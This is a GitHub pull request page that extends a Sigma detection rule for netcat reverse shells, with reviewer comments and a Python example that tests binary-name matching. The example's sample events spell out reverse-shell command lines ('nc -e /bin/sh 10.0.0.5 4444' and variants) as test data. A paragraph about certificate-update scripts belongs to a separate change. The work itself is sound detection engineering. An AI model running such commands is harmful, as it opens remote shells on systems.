
update: Potential Netcat Reverse Shell Execution - add nc.openbsd and nc.traditional binary matches#6013

Open
Bit-ByteBandit wants to merge 4 commits into SigmaHQ:master from Bit-ByteBandit:netcat-reverse-shell-fix

Conversation

@Bit-ByteBandit

Summary of the Pull Request

Expand the Linux Potential Netcat Reverse Shell Execution rule to also match nc.openbsd and nc.traditional.

The existing /nc match is kept because nc is commonly used as a symlink to nc.openbsd on some systems. Keeping it avoids reducing coverage while adding coverage for additional netcat binary names.

Changelog

update: Potential Netcat Reverse Shell Execution - add nc.openbsd and nc.traditional binary matches

Example Log Event

N/A

Fixed Issues

N/A

SigmaHQ Rule Creation Conventions

  • If your PR adds new rules, please consider following and applying these conventions
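Added example, not the SigmaHQ rule file or the author's code: it evaluates the binary-name list from this PR (before, as changed, and as the reviewer suggests below) against constructed Linux process-creation events, and rebuilds the Debian-style `nc -> /etc/alternatives/nc -> nc.openbsd` symlink chain to show why a collector that logs the resolved executable path needs the `nc.openbsd` entry. Two assumptions: the list is matched with `Image|endswith`, and the rule additionally requires a ` -e ` or ` -c ` flag on the command line; the thread does not show the rule's field names or its command-line conditions.

```python
"""Illustrative re-implementation of the netcat binary-name selection.

Added example, not SigmaHQ's rule: field names follow the Sigma
process_creation model, the flag check is an assumption, and all events
below are constructed for the demonstration.
"""
import os
import tempfile
from typing import Iterable, List

# Suffix lists as they appear in the PR thread.
SUFFIXES_BEFORE = ("/nc", "/ncat")
SUFFIXES_PR = ("/nc", "/nc.openbsd", "/nc.traditional", "/ncat")
SUFFIXES_SUGGESTED = (
    "/nc.openbsd", "/nc.traditional", "/nc", "/ncat",
    "/netcat.openbsd", "/netcat.traditional", "/netcat",
)

# Assumption: the rule also requires a shell-execution flag on the command
# line. The real rule's CommandLine conditions are not visible in the thread.
SHELL_EXEC_FLAGS = (" -e ", " -c ")

# Constructed sample events (not real logs). Flag support differs between
# netcat variants; the point here is only the Image suffix matching.
SAMPLE_EVENTS = [
    {"Image": "/usr/bin/nc", "CommandLine": "nc -e /bin/sh 10.0.0.5 4444"},
    {"Image": "/usr/bin/nc.openbsd", "CommandLine": "nc.openbsd -c /bin/sh 10.0.0.5 4444"},
    {"Image": "/usr/bin/nc.traditional", "CommandLine": "nc.traditional -e /bin/sh 10.0.0.5 4444"},
    {"Image": "/usr/bin/netcat", "CommandLine": "netcat -e /bin/bash 10.0.0.5 4444"},
    {"Image": "/usr/bin/ncat", "CommandLine": "ncat 10.0.0.5 4444 -e /bin/sh"},
    # Benign: ' -e ' is present and the name ends in "nc", but the leading
    # slash in every suffix keeps "/usr/bin/rsync" from matching "/nc".
    {"Image": "/usr/bin/rsync", "CommandLine": "rsync -e ssh -a src/ host:dst/"},
]


def image_matches(image: str, suffixes: Iterable[str]) -> bool:
    """Sigma `endswith` semantics: the whole value must end with one entry."""
    return any(image.endswith(s) for s in suffixes)


def rule_matches(event: dict, suffixes: Iterable[str]) -> bool:
    """Both selections must hold (equivalent to `selection_nc and selection_flags`)."""
    cmd = event["CommandLine"]
    return image_matches(event["Image"], suffixes) and any(f in cmd for f in SHELL_EXEC_FLAGS)


def matched_images(events: List[dict], suffixes: Iterable[str]) -> List[str]:
    """Return the Image values of all events the selection fires on, in input order."""
    return [e["Image"] for e in events if rule_matches(e, suffixes)]


def resolved_nc_basename() -> str:
    """Recreate the alternatives chain /usr/bin/nc -> /etc/alternatives/nc ->
    /usr/bin/nc.openbsd in a scratch directory and return the basename a
    collector records if it logs the resolved executable path rather than
    the name the process was invoked by."""
    with tempfile.TemporaryDirectory() as root:
        bin_dir = os.path.join(root, "usr", "bin")
        alt_dir = os.path.join(root, "etc", "alternatives")
        os.makedirs(bin_dir)
        os.makedirs(alt_dir)
        real = os.path.join(bin_dir, "nc.openbsd")
        open(real, "w").close()  # placeholder standing in for the real binary
        os.symlink(real, os.path.join(alt_dir, "nc"))
        os.symlink(os.path.join(alt_dir, "nc"), os.path.join(bin_dir, "nc"))
        return os.path.basename(os.path.realpath(os.path.join(bin_dir, "nc")))


if __name__ == "__main__":
    for name, suffixes in (("before", SUFFIXES_BEFORE), ("PR", SUFFIXES_PR),
                           ("suggested", SUFFIXES_SUGGESTED)):
        print(f"{name:9}: {matched_images(SAMPLE_EVENTS, suffixes)}")
    print("resolved /usr/bin/nc ->", resolved_nc_basename())
```

With the pre-PR list, the `nc.openbsd` and `nc.traditional` events are missed entirely, because `endswith` compares the whole value and `/nc` is not a suffix of `/usr/bin/nc.openbsd`; the symlink helper shows that a collector which resolves `/usr/bin/nc` to its target reports exactly that missed name, which is the gap the PR closes.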

These certificate trust update utilities are shell scripts, not regular binaries. In process creation logs, the Image field may show the shell interpreter while the actual utility appears in CommandLine. This changes the detection from Image|endswith to CommandLine|contains to avoid missing script-based executions.

Expand the netcat reverse shell rule to also match nc.openbsd and
nc.traditional.

Keep the existing /nc match because nc may be installed directly as the
binary name or exposed through alternatives/symlinks on some systems.
Keeping it avoids reducing coverage while adding coverage for additional
netcat binary names.
@github-actions github-actions Bot added Rules Review Needed The PR requires review Linux Pull request add/update linux related rules labels May 14, 2026
Comment on lines 23 to 26
- '/nc'
- '/nc.openbsd'
- '/nc.traditional'
- '/ncat'
Collaborator


Suggested change
- '/nc'
- '/nc.openbsd'
- '/nc.traditional'
- '/ncat'
- '/nc.openbsd'
- '/nc.traditional'
- '/nc'
- '/ncat'
- '/netcat.openbsd'
- '/netcat.traditional'
- '/netcat'
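Review bot: if this suggestion is taken, the PR title and the Changelog entry ("add nc.openbsd and nc.traditional binary matches") no longer describe the full change, since `/netcat.openbsd`, `/netcat.traditional` and `/netcat` are added as well; update both to list the netcat variants too. The reordering of `/nc.openbsd` and `/nc.traditional` ahead of `/nc` has no effect on matching, as the list entries are alternatives, so that part is a style choice only.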

- https://www.infosecademy.com/netcat-reverse-shells/
- https://man7.org/linux/man-pages/man1/ncat.1.html
author: '@d4ns4n_, Nasreddine Bencherchali (Nextron Systems)'
author: '@d4ns4n_, Nasreddine Bencherchali (Nextron Systems), Eissa Bageri'
Collaborator


Suggested change
author: '@d4ns4n_, Nasreddine Bencherchali (Nextron Systems), Eissa Bageri'
author: '@d4ns4n_, Nasreddine Bencherchali (Nextron Systems)'

Adding a few entries to existing logic doesn't constitute authorship unless a major change is made to the rule's logic.

Comment on lines +18 to +20
CommandLine|contains:
- 'update-ca-certificates'
- 'update-ca-trust'
Collaborator

@swachchhanda000 swachchhanda000 May 22, 2026


Either close your old PR #6013 to keep this change here (making all the necessary changes to the PR title, description, etc., of course) or remove this change.

@swachchhanda000 swachchhanda000 added the Author Input Required changes the require information from original author of the rules label May 22, 2026
@swachchhanda000 swachchhanda000 added this to the Sigma-May-Release milestone May 22, 2026
Collaborator

@swachchhanda000 swachchhanda000 left a comment


Hi @Bit-ByteBandit,

Thanks for your submission. Looks solid.

I have some questions and suggestions for you. Please have a look.

Cheers!


Labels

  • Author Input Required: changes that require information from the original author of the rules
  • Linux: pull request adds/updates Linux related rules
  • Review Needed: the PR requires review
  • Rules

2 participants